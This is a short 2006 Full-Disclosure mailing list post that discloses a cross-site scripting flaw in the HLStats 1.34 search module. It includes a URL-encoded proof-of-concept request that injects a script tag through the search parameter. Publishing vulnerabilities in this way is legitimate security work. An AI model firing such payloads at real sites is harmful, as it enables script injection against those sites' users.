[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS in HLStats 1.34
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XSS in HLStats 1.34
- From: kefka <kefka@xxxxxxxxxxxxxxxxxxx>
- Date: Tue, 29 Aug 2006 03:47:29 -0400
Cross-site Scripting Vulnerability in HLStats 1.34
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
Search module fails to sanitize quotes.
kefka
kefka@xxxxxxxxxxxxxxxxxxx
Thanks to RSnake
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/